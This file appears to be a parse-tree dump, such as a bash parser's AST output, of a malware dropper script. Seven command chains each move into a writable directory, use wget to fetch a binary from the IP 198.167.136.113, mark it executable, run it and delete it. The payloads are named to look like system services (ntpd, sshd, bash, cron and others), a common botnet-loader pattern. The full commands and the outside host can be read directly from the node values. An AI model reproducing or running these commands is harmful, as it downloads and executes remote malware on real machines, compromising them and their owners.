ListNode(lineno=2, pos=(12, 135), parts=[
  CommandNode(lineno=2, pos=(12, 19), parts=[
    WordNode(lineno=2, pos=(12, 14), word='cd'),
    WordNode(lineno=2, pos=(15, 19), word='/tmp'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(20, 22)),
  CommandNode(lineno=2, pos=(23, 34), parts=[
    WordNode(lineno=2, pos=(23, 25), word='cd'),
    WordNode(lineno=2, pos=(26, 34), word='/var/run'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(35, 37)),
  CommandNode(lineno=2, pos=(38, 45), parts=[
    WordNode(lineno=2, pos=(38, 40), word='cd'),
    WordNode(lineno=2, pos=(41, 45), word='/mnt'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(46, 48)),
  CommandNode(lineno=2, pos=(49, 57), parts=[
    WordNode(lineno=2, pos=(49, 51), word='cd'),
    WordNode(lineno=2, pos=(52, 57), word='/root'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(58, 60)),
  CommandNode(lineno=2, pos=(61, 65), parts=[
    WordNode(lineno=2, pos=(61, 63), word='cd'),
    WordNode(lineno=2, pos=(64, 65), word='/'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(65, 66)),
  CommandNode(lineno=2, pos=(67, 99), parts=[
    WordNode(lineno=2, pos=(67, 71), word='wget'),
    WordNode(lineno=2, pos=(72, 99), word='http://198.167.136.113/ntpd'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(99, 100)),
  CommandNode(lineno=2, pos=(101, 114), parts=[
    WordNode(lineno=2, pos=(101, 106), word='chmod'),
    WordNode(lineno=2, pos=(107, 109), word='+x'),
    WordNode(lineno=2, pos=(110, 114), word='ntpd'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(114, 115)),
  CommandNode(lineno=2, pos=(116, 122), parts=[
    WordNode(lineno=2, pos=(116, 122), word='./ntpd'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(122, 123)),
  CommandNode(lineno=2, pos=(124, 135), parts=[
    WordNode(lineno=2, pos=(124, 126), word='rm'),
    WordNode(lineno=2, pos=(127, 130), word='-rf'),
    WordNode(lineno=2, pos=(131, 135), word='ntpd'),
  ]),
])
ListNode(lineno=3, pos=(136, 259), parts=[
  CommandNode(lineno=3, pos=(136, 143), parts=[
    WordNode(lineno=3, pos=(136, 138), word='cd'),
    WordNode(lineno=3, pos=(139, 143), word='/tmp'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(144, 146)),
  CommandNode(lineno=3, pos=(147, 158), parts=[
    WordNode(lineno=3, pos=(147, 149), word='cd'),
    WordNode(lineno=3, pos=(150, 158), word='/var/run'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(159, 161)),
  CommandNode(lineno=3, pos=(162, 169), parts=[
    WordNode(lineno=3, pos=(162, 164), word='cd'),
    WordNode(lineno=3, pos=(165, 169), word='/mnt'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(170, 172)),
  CommandNode(lineno=3, pos=(173, 181), parts=[
    WordNode(lineno=3, pos=(173, 175), word='cd'),
    WordNode(lineno=3, pos=(176, 181), word='/root'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(182, 184)),
  CommandNode(lineno=3, pos=(185, 189), parts=[
    WordNode(lineno=3, pos=(185, 187), word='cd'),
    WordNode(lineno=3, pos=(188, 189), word='/'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(189, 190)),
  CommandNode(lineno=3, pos=(191, 223), parts=[
    WordNode(lineno=3, pos=(191, 195), word='wget'),
    WordNode(lineno=3, pos=(196, 223), word='http://198.167.136.113/sshd'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(223, 224)),
  CommandNode(lineno=3, pos=(225, 238), parts=[
    WordNode(lineno=3, pos=(225, 230), word='chmod'),
    WordNode(lineno=3, pos=(231, 233), word='+x'),
    WordNode(lineno=3, pos=(234, 238), word='sshd'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(238, 239)),
  CommandNode(lineno=3, pos=(240, 246), parts=[
    WordNode(lineno=3, pos=(240, 246), word='./sshd'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(246, 247)),
  CommandNode(lineno=3, pos=(248, 259), parts=[
    WordNode(lineno=3, pos=(248, 250), word='rm'),
    WordNode(lineno=3, pos=(251, 254), word='-rf'),
    WordNode(lineno=3, pos=(255, 259), word='sshd'),
  ]),
])
ListNode(lineno=4, pos=(260, 383), parts=[
  CommandNode(lineno=4, pos=(260, 267), parts=[
    WordNode(lineno=4, pos=(260, 262), word='cd'),
    WordNode(lineno=4, pos=(263, 267), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(268, 270)),
  CommandNode(lineno=4, pos=(271, 282), parts=[
    WordNode(lineno=4, pos=(271, 273), word='cd'),
    WordNode(lineno=4, pos=(274, 282), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(283, 285)),
  CommandNode(lineno=4, pos=(286, 293), parts=[
    WordNode(lineno=4, pos=(286, 288), word='cd'),
    WordNode(lineno=4, pos=(289, 293), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(294, 296)),
  CommandNode(lineno=4, pos=(297, 305), parts=[
    WordNode(lineno=4, pos=(297, 299), word='cd'),
    WordNode(lineno=4, pos=(300, 305), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(306, 308)),
  CommandNode(lineno=4, pos=(309, 313), parts=[
    WordNode(lineno=4, pos=(309, 311), word='cd'),
    WordNode(lineno=4, pos=(312, 313), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(313, 314)),
  CommandNode(lineno=4, pos=(315, 347), parts=[
    WordNode(lineno=4, pos=(315, 319), word='wget'),
    WordNode(lineno=4, pos=(320, 347), word='http://198.167.136.113/bash'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(347, 348)),
  CommandNode(lineno=4, pos=(349, 362), parts=[
    WordNode(lineno=4, pos=(349, 354), word='chmod'),
    WordNode(lineno=4, pos=(355, 357), word='+x'),
    WordNode(lineno=4, pos=(358, 362), word='bash'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(362, 363)),
  CommandNode(lineno=4, pos=(364, 370), parts=[
    WordNode(lineno=4, pos=(364, 370), word='./bash'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(370, 371)),
  CommandNode(lineno=4, pos=(372, 383), parts=[
    WordNode(lineno=4, pos=(372, 374), word='rm'),
    WordNode(lineno=4, pos=(375, 378), word='-rf'),
    WordNode(lineno=4, pos=(379, 383), word='bash'),
  ]),
])
ListNode(lineno=5, pos=(384, 507), parts=[
  CommandNode(lineno=5, pos=(384, 391), parts=[
    WordNode(lineno=5, pos=(384, 386), word='cd'),
    WordNode(lineno=5, pos=(387, 391), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(392, 394)),
  CommandNode(lineno=5, pos=(395, 406), parts=[
    WordNode(lineno=5, pos=(395, 397), word='cd'),
    WordNode(lineno=5, pos=(398, 406), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(407, 409)),
  CommandNode(lineno=5, pos=(410, 417), parts=[
    WordNode(lineno=5, pos=(410, 412), word='cd'),
    WordNode(lineno=5, pos=(413, 417), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(418, 420)),
  CommandNode(lineno=5, pos=(421, 429), parts=[
    WordNode(lineno=5, pos=(421, 423), word='cd'),
    WordNode(lineno=5, pos=(424, 429), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(430, 432)),
  CommandNode(lineno=5, pos=(433, 437), parts=[
    WordNode(lineno=5, pos=(433, 435), word='cd'),
    WordNode(lineno=5, pos=(436, 437), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(437, 438)),
  CommandNode(lineno=5, pos=(439, 471), parts=[
    WordNode(lineno=5, pos=(439, 443), word='wget'),
    WordNode(lineno=5, pos=(444, 471), word='http://198.167.136.113/tftp'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(471, 472)),
  CommandNode(lineno=5, pos=(473, 486), parts=[
    WordNode(lineno=5, pos=(473, 478), word='chmod'),
    WordNode(lineno=5, pos=(479, 481), word='+x'),
    WordNode(lineno=5, pos=(482, 486), word='tftp'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(486, 487)),
  CommandNode(lineno=5, pos=(488, 494), parts=[
    WordNode(lineno=5, pos=(488, 494), word='./tftp'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(494, 495)),
  CommandNode(lineno=5, pos=(496, 507), parts=[
    WordNode(lineno=5, pos=(496, 498), word='rm'),
    WordNode(lineno=5, pos=(499, 502), word='-rf'),
    WordNode(lineno=5, pos=(503, 507), word='tftp'),
  ]),
])
ListNode(lineno=6, pos=(508, 631), parts=[
  CommandNode(lineno=6, pos=(508, 515), parts=[
    WordNode(lineno=6, pos=(508, 510), word='cd'),
    WordNode(lineno=6, pos=(511, 515), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(516, 518)),
  CommandNode(lineno=6, pos=(519, 530), parts=[
    WordNode(lineno=6, pos=(519, 521), word='cd'),
    WordNode(lineno=6, pos=(522, 530), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(531, 533)),
  CommandNode(lineno=6, pos=(534, 541), parts=[
    WordNode(lineno=6, pos=(534, 536), word='cd'),
    WordNode(lineno=6, pos=(537, 541), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(542, 544)),
  CommandNode(lineno=6, pos=(545, 553), parts=[
    WordNode(lineno=6, pos=(545, 547), word='cd'),
    WordNode(lineno=6, pos=(548, 553), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(554, 556)),
  CommandNode(lineno=6, pos=(557, 561), parts=[
    WordNode(lineno=6, pos=(557, 559), word='cd'),
    WordNode(lineno=6, pos=(560, 561), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(561, 562)),
  CommandNode(lineno=6, pos=(563, 595), parts=[
    WordNode(lineno=6, pos=(563, 567), word='wget'),
    WordNode(lineno=6, pos=(568, 595), word='http://198.167.136.113/wget'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(595, 596)),
  CommandNode(lineno=6, pos=(597, 610), parts=[
    WordNode(lineno=6, pos=(597, 602), word='chmod'),
    WordNode(lineno=6, pos=(603, 605), word='+x'),
    WordNode(lineno=6, pos=(606, 610), word='wget'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(610, 611)),
  CommandNode(lineno=6, pos=(612, 618), parts=[
    WordNode(lineno=6, pos=(612, 618), word='./wget'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(618, 619)),
  CommandNode(lineno=6, pos=(620, 631), parts=[
    WordNode(lineno=6, pos=(620, 622), word='rm'),
    WordNode(lineno=6, pos=(623, 626), word='-rf'),
    WordNode(lineno=6, pos=(627, 631), word='wget'),
  ]),
])
ListNode(lineno=7, pos=(632, 755), parts=[
  CommandNode(lineno=7, pos=(632, 639), parts=[
    WordNode(lineno=7, pos=(632, 634), word='cd'),
    WordNode(lineno=7, pos=(635, 639), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(640, 642)),
  CommandNode(lineno=7, pos=(643, 654), parts=[
    WordNode(lineno=7, pos=(643, 645), word='cd'),
    WordNode(lineno=7, pos=(646, 654), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(655, 657)),
  CommandNode(lineno=7, pos=(658, 665), parts=[
    WordNode(lineno=7, pos=(658, 660), word='cd'),
    WordNode(lineno=7, pos=(661, 665), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(666, 668)),
  CommandNode(lineno=7, pos=(669, 677), parts=[
    WordNode(lineno=7, pos=(669, 671), word='cd'),
    WordNode(lineno=7, pos=(672, 677), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(678, 680)),
  CommandNode(lineno=7, pos=(681, 685), parts=[
    WordNode(lineno=7, pos=(681, 683), word='cd'),
    WordNode(lineno=7, pos=(684, 685), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(685, 686)),
  CommandNode(lineno=7, pos=(687, 719), parts=[
    WordNode(lineno=7, pos=(687, 691), word='wget'),
    WordNode(lineno=7, pos=(692, 719), word='http://198.167.136.113/cron'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(719, 720)),
  CommandNode(lineno=7, pos=(721, 734), parts=[
    WordNode(lineno=7, pos=(721, 726), word='chmod'),
    WordNode(lineno=7, pos=(727, 729), word='+x'),
    WordNode(lineno=7, pos=(730, 734), word='cron'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(734, 735)),
  CommandNode(lineno=7, pos=(736, 742), parts=[
    WordNode(lineno=7, pos=(736, 742), word='./cron'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(742, 743)),
  CommandNode(lineno=7, pos=(744, 755), parts=[
    WordNode(lineno=7, pos=(744, 746), word='rm'),
    WordNode(lineno=7, pos=(747, 750), word='-rf'),
    WordNode(lineno=7, pos=(751, 755), word='cron'),
  ]),
])
ListNode(lineno=8, pos=(756, 875), parts=[
  CommandNode(lineno=8, pos=(756, 763), parts=[
    WordNode(lineno=8, pos=(756, 758), word='cd'),
    WordNode(lineno=8, pos=(759, 763), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(764, 766)),
  CommandNode(lineno=8, pos=(767, 778), parts=[
    WordNode(lineno=8, pos=(767, 769), word='cd'),
    WordNode(lineno=8, pos=(770, 778), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(779, 781)),
  CommandNode(lineno=8, pos=(782, 789), parts=[
    WordNode(lineno=8, pos=(782, 784), word='cd'),
    WordNode(lineno=8, pos=(785, 789), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(790, 792)),
  CommandNode(lineno=8, pos=(793, 801), parts=[
    WordNode(lineno=8, pos=(793, 795), word='cd'),
    WordNode(lineno=8, pos=(796, 801), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(802, 804)),
  CommandNode(lineno=8, pos=(805, 809), parts=[
    WordNode(lineno=8, pos=(805, 807), word='cd'),
    WordNode(lineno=8, pos=(808, 809), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(809, 810)),
  CommandNode(lineno=8, pos=(811, 842), parts=[
    WordNode(lineno=8, pos=(811, 815), word='wget'),
    WordNode(lineno=8, pos=(816, 842), word='http://198.167.136.113/ftp'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(842, 843)),
  CommandNode(lineno=8, pos=(844, 856), parts=[
    WordNode(lineno=8, pos=(844, 849), word='chmod'),
    WordNode(lineno=8, pos=(850, 852), word='+x'),
    WordNode(lineno=8, pos=(853, 856), word='ftp'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(856, 857)),
  CommandNode(lineno=8, pos=(858, 863), parts=[
    WordNode(lineno=8, pos=(858, 863), word='./ftp'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(863, 864)),
  CommandNode(lineno=8, pos=(865, 875), parts=[
    WordNode(lineno=8, pos=(865, 867), word='rm'),
    WordNode(lineno=8, pos=(868, 871), word='-rf'),
    WordNode(lineno=8, pos=(872, 875), word='ftp'),
  ]),
])
